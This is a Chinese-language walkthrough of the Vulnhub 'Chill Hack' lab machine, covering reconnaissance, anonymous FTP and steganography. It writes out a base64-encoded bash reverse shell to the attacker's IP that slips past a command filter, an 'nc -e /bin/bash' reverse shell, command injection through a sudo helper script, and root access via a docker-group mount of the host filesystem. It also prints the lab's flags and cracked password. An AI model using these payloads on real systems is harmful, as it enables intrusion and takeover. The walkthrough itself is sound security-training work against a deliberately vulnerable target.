首页 > 其他分享 >Vulnhub之Chill Hack靶机详细测试过程

Vulnhub之Chill Hack靶机详细测试过程

时间:2023-01-30 20:22:24浏览次数:39  
标签:hacker -- kali 2020 Vulnhub Hack root Oct Chill

Chill Hack

作者:jason_huawen

靶机信息

名称:Chill Hack: 1

地址:

https://www.vulnhub.com/entry/chill-hack-1,622/

识别目标主机IP地址

由于目标主机无法自动获取IP地址,因此参照本人另文解决该问题。

(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:fb:7c:2e      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.205  08:00:27:d5:5f:8d      1      60  PCS Systemtechnik GmbH        

利用Kali Linux自带的netdiscover工具识别目标主机IP地址为192.168.56.205

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.205 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 05:58 EST
Nmap scan report for 192.168.56.205
Host is up (0.000089s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 1001     1001           90 Oct 03  2020 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.206
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 09f95db918d0b23a822d6e768cc20144 (RSA)
|   256 1bcf3a498b1b20b02c6aa551a88f1e62 (ECDSA)
|_  256 3005cc52c66f6504860f7241c8a439cf (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Game Info
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:D5:5F:8D (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.79 seconds

NMAP扫描结果表明目标主机有3个开放端口:21(FTP)、22(SSH)、80(HTTP)

获得Shell

┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ ftp 192.168.56.205
Connected to 192.168.56.205.
220 (vsFTPd 3.0.3)
Name (192.168.56.205:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||10801|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        115          4096 Oct 03  2020 .
drwxr-xr-x    2 0        115          4096 Oct 03  2020 ..
-rw-r--r--    1 1001     1001           90 Oct 03  2020 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||42392|)
150 Opening BINARY mode data connection for note.txt (90 bytes).
100% |********************************************************************************|    90       98.09 KiB/s    00:00 ETA
226 Transfer complete.
90 bytes received in 00:00 (65.44 KiB/s)
ftp> put test.txt 
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||55210|)
550 Permission denied.
ftp> quit
221 Goodbye.
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ searchsploit vsFTPd 3.0.3                                  
-------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                              |  Path
-------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 3.0.3 - Remote Denial of Service                                                     | multiple/remote/49719.py
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

  1. 目标主机FTP允许匿名访问

  2. 匿名用户不允许上传文件

  3. FTP服务不存在可利用的漏洞

┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ cat note.txt           
Anurodh told me that there is some filtering on strings being put in the command -- Apaar

  1. 对命令有过滤机制

  2. 用户名: Anurodh, Apaar

┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ curl http://192.168.56.205/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.205 Port 80</address>
</body></html>

┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ nikto -h http://192.168.56.205
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.205
+ Target Hostname:    192.168.56.205
+ Target Port:        80
+ Start Time:         2023-01-30 06:12:34 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 8970, size: 56d7e303a7e80, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST 
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2023-01-30 06:13:26 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

发现了/secret目录,可以执行命令,显然有过滤机制。(结合前面得到note.txt文件)

对命令进行base64编码可以轻松绕开过滤:

──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ echo 'bash -i >& /dev/tcp/192.168.56.206/5555 0>&1' | base64       
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjIwNi81NTU1IDA+JjEK

在/secret/页面执行以下命令:

echo 
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjIwNi81NTU1IDA+Jj | base64 -d |bash

在Kali Linux成功得到目标主机反弹回来的shell

┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.205] 40494
bash: cannot set terminal process group (1308): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/secret$ 

提权

将linpeas.sh脚本上传至目标主机/tmp目录下,修改权限,并执行脚本,其中输出结果:

                                                                                                                              
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid                                                   
Matching Defaults entries for www-data on ubuntu:                                                                             
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh

www-data@ubuntu:/tmp$ sudo -u apaar /home/apaar/.helpline.sh
sudo -u apaar /home/apaar/.helpline.sh

Welcome to helpdesk. Feel free to talk to anyone at any time!

jason;/bin/bash
id
uid=1001(apaar) gid=1001(apaar) groups=1001(apaar)
Thank you for your precious time!
www-data@ubuntu:/tmp$ 

也就是说可以利用命令包含活动获得另一个shell,而且是用户apaar的shell

www-data@ubuntu:/tmp$ sudo -u apaar /home/apaar/.helpline.sh
sudo -u apaar /home/apaar/.helpline.sh

Welcome to helpdesk. Feel free to talk to anyone at any time!

jason;/bin/bash
nc -e /bin/bash 192.168.56.206 6666;
Thank you for your precious time!

但是没有得到反弹回来的shell,这条路行不通。

仔细查看目录,发现了hacker.php文件

www-data@ubuntu:/var/www/files$ cat hacker.php
cat hacker.php
<html>
<head>
<body>
<style>
body {
  background-image: url('images/002d7e638fb463fb7a266f5ffc7ac47d.gif');
}
h2
{
        color:red;
        font-weight: bold;
}
h1
{
        color: yellow;
        font-weight: bold;
}
</style>
<center>
        <img src = "images/hacker-with-laptop_23-2147985341.jpg"><br>
        <h1 style="background-color:red;">You have reached this far. </h2>
        <h1 style="background-color:black;">Look in the dark! You will find your answer</h1>
</center>
</head>
</html>
www-data@ubuntu:/var/www/files$ 

将该图片下载到kali Linux本地

www-data@ubuntu:/var/www/files/images$ ls -alh
ls -alh
total 2.1M
drwxr-xr-x 2 root root 4.0K Oct  3  2020 .
drwxr-xr-x 3 root root 4.0K Oct  3  2020 ..
-rw-r--r-- 1 root root 2.0M Oct  3  2020 002d7e638fb463fb7a266f5ffc7ac47d.gif
-rw-r--r-- 1 root root  68K Oct  3  2020 hacker-with-laptop_23-2147985341.jpg

www-data@ubuntu:/var/www/files$ cd images
cd images
www-data@ubuntu:/var/www/files/images$ ls -alh
ls -alh
total 2.1M
drwxr-xr-x 2 root root 4.0K Oct  3  2020 .
drwxr-xr-x 3 root root 4.0K Oct  3  2020 ..
-rw-r--r-- 1 root root 2.0M Oct  3  2020 002d7e638fb463fb7a266f5ffc7ac47d.gif
-rw-r--r-- 1 root root  68K Oct  3  2020 hacker-with-laptop_23-2147985341.jpg
www-data@ubuntu:/var/www/files/images$ which python
which python
www-data@ubuntu:/var/www/files/images$ which python3
which python3
/usr/bin/python3
www-data@ubuntu:/var/www/files/images$ python3 -m http.server
python3 -m http.server

┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ wget http://192.168.56.205:8000/hacker-with-laptop_23-2147985341.jpg
--2023-01-30 06:47:47--  http://192.168.56.205:8000/hacker-with-laptop_23-2147985341.jpg
Connecting to 192.168.56.205:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 68841 (67K) [image/jpeg]
Saving to: ‘hacker-with-laptop_23-2147985341.jpg’

hacker-with-laptop_23-214798534 100%[=====================================================>]  67.23K  --.-KB/s    in 0.001s  

2023-01-30 06:47:47 (48.6 MB/s) - ‘hacker-with-laptop_23-2147985341.jpg’ saved [68841/68841]

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ ls
hacker-with-laptop_23-2147985341.jpg  linpeas.sh  nmap_full_scan  note.txt  test.txt

┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ stegseek hacker-with-laptop_23-2147985341.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: ""
[i] Original filename: "backup.zip".
[i] Extracting to "hacker-with-laptop_23-2147985341.jpg.out".

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ ls -alh
total 836K
drwxr-xr-x  2 kali kali 4.0K Jan 30 06:48 .
drwxr-xr-x 30 kali kali 4.0K Jan 30 05:50 ..
-rw-r--r--  1 kali kali  68K Oct  3  2020 hacker-with-laptop_23-2147985341.jpg
-rw-r--r--  1 kali kali  750 Jan 30 06:48 hacker-with-laptop_23-2147985341.jpg.out
-rw-r--r--  1 kali kali 748K Jan 30 06:26 linpeas.sh
-rw-r--r--  1 root root 1.5K Jan 30 05:58 nmap_full_scan
-rw-r--r--  1 kali kali   90 Oct  3  2020 note.txt
-rw-r--r--  1 kali kali    0 Jan 30 06:01 test.txt
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ cat hacker-with-laptop_23-2147985341.jpg.out 
PK     �"CQ���i*�source_code.phpUT      �w_�w_ux
                                                ���㤸,ɀw�p������        G8t27���j��@Q�����$b�$�y�H�}7+Ƥ\!u:{k�Ϡ�GmNWݹ����E��+��8��n�9Ąjj�n�@'�3�c�    �n-�L��C7��d!yFɃT
                                         o�!�C���▒�ń]ъ5,����_5�B��Z�
                                                                    ��JqQ�<▒�t
����y�. ԅN�H3V���r[^|�uK"�Dd�^ۉ���j,e�G�Ԟ�)���!E�����$S�_���|י<���*ن��4���_�g@N �ޖn`��1����p��{}fA��jJ1��x��{z��Z��u����L�u�I�/-"�y�=��������K�}�#]�b�
                        �>;T�E�xA!��]]
�+�w                                  ����2 �*S��>}��_��=���ц�▒z�4Gr^V�_�&Y���Y����2Kf�d]�@���+��¥T��z_�G����G�9�-��]h� ��gG
�4Y�j_�fGo��?O(������O�(��9=#=���P���i*�PK     �"CQ���i*�▒��source_code.phpUT�w_ux
                                                                                  PKU�                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ file hacker-with-laptop_23-2147985341.jpg.out 
hacker-with-laptop_23-2147985341.jpg.out: Zip archive data, at least v2.0 to extract, compression method=deflate

发现zip文档被加密:

┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ unzip hacker-with-laptop_23-2147985341.jpg.out 
Archive:  hacker-with-laptop_23-2147985341.jpg.out
[hacker-with-laptop_23-2147985341.jpg.out] source_code.php password:  
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ file hacker-with-laptop_23-2147985341.jpg.out 
hacker-with-laptop_23-2147985341.jpg.out: Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ unzip hacker-with-laptop_23-2147985341.jpg.out 
Archive:  hacker-with-laptop_23-2147985341.jpg.out
[hacker-with-laptop_23-2147985341.jpg.out] source_code.php password:                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ zip2john hacker-with-laptop_23-2147985341.jpg.out > hashes
ver 2.0 efh 5455 efh 7875 hacker-with-laptop_23-2147985341.jpg.out/source_code.php PKZIP Encr: TS_chk, cmplen=554, decmplen=1211, crc=69DC82F3 ts=2297 cs=2297 type=8
                                           
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes                      
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pass1word        (hacker-with-laptop_23-2147985341.jpg.out/source_code.php)     
1g 0:00:00:00 DONE (2023-01-30 06:52) 25.00g/s 307200p/s 307200c/s 307200C/s total90..hawkeye
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$  unzip hacker-with-laptop_23-2147985341.jpg.out 
Archive:  hacker-with-laptop_23-2147985341.jpg.out
[hacker-with-laptop_23-2147985341.jpg.out] source_code.php password: 
  inflating: source_code.php         
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ ls     
hacker-with-laptop_23-2147985341.jpg      hashes      nmap_full_scan  source_code.php
hacker-with-laptop_23-2147985341.jpg.out  linpeas.sh  note.txt        test.txt
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ cat source_code.php                         
<html>
<head>
        Admin Portal
</head>
        <title> Site Under Development ... </title>
        <body>
                <form method="POST">
                        Username: <input type="text" name="name" placeholder="username"><br><br>
                        Email: <input type="email" name="email" placeholder="email"><br><br>
                        Password: <input type="password" name="password" placeholder="password">
                        <input type="submit" name="submit" value="Submit"> 
                </form>
<?php
        if(isset($_POST['submit']))
        {
                $email = $_POST["email"];
                $password = $_POST["password"];
                if(base64_encode($password) == "IWQwbnRLbjB3bVlwQHNzdzByZA==")
                { 
                        $random = rand(1000,9999);?><br><br><br>
                        <form method="POST">
                                Enter the OTP: <input type="number" name="otp">
                                <input type="submit" name="submitOtp" value="Submit">
                        </form>
                <?php   mail($email,"OTP for authentication",$random);
                        if(isset($_POST["submitOtp"]))
                                {
                                        $otp = $_POST["otp"];
                                        if($otp == $random)
                                        {
                                                echo "Welcome Anurodh!";
                                                header("Location: authenticated.php");
                                        }
                                        else
                                        {
                                                echo "Invalid OTP";
                                        }
                                }
                }
                else
                {
                        echo "Invalid Username or Password";
                }
        }
?>
</html>
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ echo 'IWQwbnRLbjB3bVlwQHNzdzByZA==' | base64 -d                    
!d0ntKn0wmYp@ssw0rd                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ 

这个密码应该是某个用户的密码,进行尝试:

www-data@ubuntu:/home$ su apaar
su apaar
su: must be run from a terminal
www-data@ubuntu:/home$ which python3
which python3
/usr/bin/python3
www-data@ubuntu:/home$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/home$ su - apaar
su - apaar
Password: !d0ntKn0wmYp@ssw0rd

su: Authentication failure
www-data@ubuntu:/home$ su - anurodh
su - anurodh
Password: !d0ntKn0wmYp@ssw0rd

anurodh@ubuntu:~$ 

发现可以成功切换到用户anurodh

anurodh@ubuntu:~$ sudo -u apaar /home/apaar/.helpline.sh

Welcome to helpdesk. Feel free to talk to anyone at any time!

Enter the person whom you want to talk with: jason
Hello user! I am jason,  Please enter your message: cat /home/apaar/local.txt
{USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}
Thank you for your precious time!
anurodh@ubuntu:~$ 

anurodh@ubuntu:/tmp$ wget http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2023-01-30 20:02:31--  http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3259593 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’

alpine-v3.13-x86_64-20210218_01 100%[=====================================================>]   3.11M  --.-KB/s    in 0.01s   

2023-01-30 20:02:31 (316 MB/s) - ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’ saved [3259593/3259593]

anurodh@ubuntu:/tmp$ ls
alpine-v3.13-x86_64-20210218_0139.tar.gz
systemd-private-cd83df7cbc904717a343517ce0048a1b-apache2.service-dQSd3y
systemd-private-cd83df7cbc904717a343517ce0048a1b-systemd-resolved.service-pl5JTK
systemd-private-cd83df7cbc904717a343517ce0048a1b-systemd-timesyncd.service-szZW26
anurodh@ubuntu:/tmp$ 

利用aunurodh是docker组成员进行root提权

anurodh@ubuntu:/tmp$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
alpine              latest              a24bb4013296        2 years ago         5.57MB
hello-world         latest              bf756fb1ae65        3 years ago         13.3kB
anurodh@ubuntu:/tmp$ docker run -v /:/mnt  -it alpine
/ # cd /mnt
/mnt # ls -alh
total 2G     
drwxr-xr-x   24 root     root        4.0K Oct  3  2020 .
drwxr-xr-x    1 root     root        4.0K Jan 30 20:05 ..
drwxr-xr-x    2 root     root        4.0K Oct  3  2020 bin
drwxr-xr-x    4 root     root        4.0K Oct  3  2020 boot
drwxr-xr-x    2 root     root        4.0K Oct  3  2020 cdrom
drwxr-xr-x   19 root     root        3.8K Jan 30 18:56 dev
drwxr-xr-x   97 root     root        4.0K Oct  4  2020 etc
drwxr-xr-x    5 root     root        4.0K Oct  3  2020 home
lrwxrwxrwx    1 root     root          34 Oct  3  2020 initrd.img -> boot/initrd.img-4.15.0-118-generic
lrwxrwxrwx    1 root     root          34 Oct  3  2020 initrd.img.old -> boot/initrd.img-4.15.0-118-generic
drwxr-xr-x   22 root     root        4.0K Oct  3  2020 lib
drwxr-xr-x    2 root     root        4.0K Aug  6  2020 lib64
drwx------    2 root     root       16.0K Oct  3  2020 lost+found
drwxr-xr-x    2 root     root        4.0K Aug  6  2020 media
drwxr-xr-x    2 root     root        4.0K Aug  6  2020 mnt
drwxr-xr-x    3 root     root        4.0K Oct  3  2020 opt
dr-xr-xr-x  197 root     root           0 Jan 30 10:56 proc
drwx------    7 root     root        4.0K Jan 30 18:54 root
drwxr-xr-x   30 root     root        1000 Jan 30 19:58 run
drwxr-xr-x    2 root     root       12.0K Oct  3  2020 sbin
drwxr-xr-x    2 root     root        4.0K Oct  3  2020 snap
drwxr-xr-x    3 root     root        4.0K Oct  3  2020 srv
-rw-------    1 root     root        2.0G Oct  3  2020 swap.img
dr-xr-xr-x   13 root     root           0 Jan 30 18:56 sys
drwxrwxrwt   10 root     root        4.0K Jan 30 20:05 tmp
drwxr-xr-x   11 root     root        4.0K Oct  3  2020 usr
drwxr-xr-x   14 root     root        4.0K Oct  3  2020 var
lrwxrwxrwx    1 root     root          31 Oct  3  2020 vmlinuz -> boot/vmlinuz-4.15.0-118-generic
lrwxrwxrwx    1 root     root          31 Oct  3  2020 vmlinuz.old -> boot/vmlinuz-4.15.0-118-generic
/mnt # cd root
/mnt/root # ls -alh
total 72K    
drwx------    7 root     root        4.0K Jan 30 18:54 .
drwxr-xr-x   24 root     root        4.0K Oct  3  2020 ..
-rw-------    1 root     root           0 Oct  4  2020 .bash_history
-rw-r--r--    1 root     root        3.0K Apr  9  2018 .bashrc
drwx------    2 root     root        4.0K Oct  3  2020 .cache
drwx------    3 root     root        4.0K Oct  3  2020 .gnupg
drwxr-xr-x    3 root     root        4.0K Jan 30 18:54 .local
-rw-------    1 root     root         370 Oct  4  2020 .mysql_history
-rw-r--r--    1 root     root         148 Aug 17  2015 .profile
-rw-r--r--    1 root     root       12.0K Oct  4  2020 .proof.txt.swp
drwx------    2 root     root        4.0K Oct  3  2020 .ssh
drwxr-xr-x    2 root     root        4.0K Oct  3  2020 .vim
-rw-------    1 root     root       11.4K Oct  4  2020 .viminfo
-rw-r--r--    1 root     root         166 Oct  3  2020 .wget-hsts
-rw-r--r--    1 root     root        1.4K Oct  4  2020 proof.txt
/mnt/root # cat proof.txt


                                        {ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}


Congratulations! You have successfully completed the challenge.


         ,-.-.     ,----.                                             _,.---._    .-._           ,----.  
,-..-.-./  \==\ ,-.--` , \   _.-.      _.-.             _,..---._   ,-.' , -  `. /==/ \  .-._ ,-.--` , \ 
|, \=/\=|- |==||==|-  _.-` .-,.'|    .-,.'|           /==/,   -  \ /==/_,  ,  - \|==|, \/ /, /==|-  _.-` 
|- |/ |/ , /==/|==|   `.-.|==|, |   |==|, |           |==|   _   _\==|   .=.     |==|-  \|  ||==|   `.-. 
 \, ,     _|==/==/_ ,    /|==|- |   |==|- |           |==|  .=.   |==|_ : ;=:  - |==| ,  | -/==/_ ,    / 
 | -  -  , |==|==|    .-' |==|, |   |==|, |           |==|,|   | -|==| , '='     |==| -   _ |==|    .-'  
  \  ,  - /==/|==|_  ,`-._|==|- `-._|==|- `-._        |==|  '='   /\==\ -    ,_ /|==|  /\ , |==|_  ,`-._ 
  |-  /\ /==/ /==/ ,     //==/ - , ,/==/ - , ,/       |==|-,   _`/  '.='. -   .' /==/, | |- /==/ ,     / 
  `--`  `--`  `--`-----`` `--`-----'`--`-----'        `-.`.____.'     `--`--''   `--`./  `--`--`-----``  


--------------------------------------------Designed By -------------------------------------------------------
                                        |  Anurodh Acharya |
                                        ---------------------

                                     Let me know if you liked it.

Twitter
        - @acharya_anurodh
Linkedin
        - www.linkedin.com/in/anurodh-acharya-b1937116a



/mnt/root # 

经验教训

  1. .helpline.sh脚本在通过反弹shell得到的shell中执行有些问题,此时应该考虑有无其他途径。

  2. 得到用户的密码,应该及时登录SSH,Shell更加稳定。

标签:hacker,--,kali,2020,Vulnhub,Hack,root,Oct,Chill
From: https://www.cnblogs.com/jason-huawen/p/17077165.html

相关文章